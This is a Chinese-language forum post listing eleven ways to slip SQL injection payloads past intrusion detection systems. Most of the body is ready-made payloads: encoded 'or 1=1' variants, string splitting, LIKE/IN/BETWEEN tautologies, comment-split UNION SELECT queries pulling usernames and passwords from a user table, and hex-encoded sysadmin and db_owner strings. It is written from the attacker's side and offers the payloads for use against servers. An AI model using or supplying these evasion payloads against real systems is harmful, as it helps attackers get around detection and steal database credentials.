發新話題

[分享] SQL Injection規避入侵檢測技術

SQL Injection規避入侵檢測技術

當我們對一個運行IDS系統的伺服器進行SQL注入時,我們往往會遇到很大的麻煩,因為我們的注射語句被過濾了,如何規避這種檢測手段就成了一門新的技術,本文就對此規避技術提出十一條思路和方法與大家分享。

一、 運用編碼技術繞過,如URLEncode編碼,ASCII編碼繞過。
如or 1=1即%6f%72%20%31%3d%31
Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

二、 通過空格繞過,如兩個空格代替一個空格,用Tab代替空格等,或者刪除所有空格,如or’swords’=‘swords’,由於mssql的鬆散性,我們可以把or ‘swords’之間的空格去掉,並不影響運行。

三、 運用字串判斷代替經典的or 1=1判斷繞過,如or ‘swords’=‘swords’

四、 通過類型轉換修飾符N繞過,如or ‘swords’ = N’swords’,大寫的N告訴mssql server 字串作為nvarchar類型,它起到類型轉換的作用,並不影響注射語句本身,但是可以避過基於知識的模式匹配IDS。

五、 通過+號拆解字串繞過,如 or ‘swords’=‘sw’+’ords’
;EXEC(‘IN’+’SERT INTO ‘+’…..’)

六、 通過LIKE繞過,如or ‘swords’ LIKE ‘sw’

七、 通過IN繞過,如or ‘swords’ IN (‘swords’)

八、 通過BETWEEN繞過,如or ‘swords’ BETWEEN ‘rw’ AND ‘tw’

九、 通過>或者<繞過,如
or ‘swords’>‘sw’
or ‘swords’<‘tw’
or 1<3

十、 運用注釋語句繞過:
用/**/代替空格,如:
UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感詞,如:
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser

十一、 用HEX繞過,一般的IDS都無法檢測出來。
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)


以上的十一條SQL Injection規避入侵偵測技術供您參考。

TOP

發新話題

本站所有圖文均屬網友發表,僅代表作者的觀點與本站無關,如有侵權請通知版主會盡快刪除。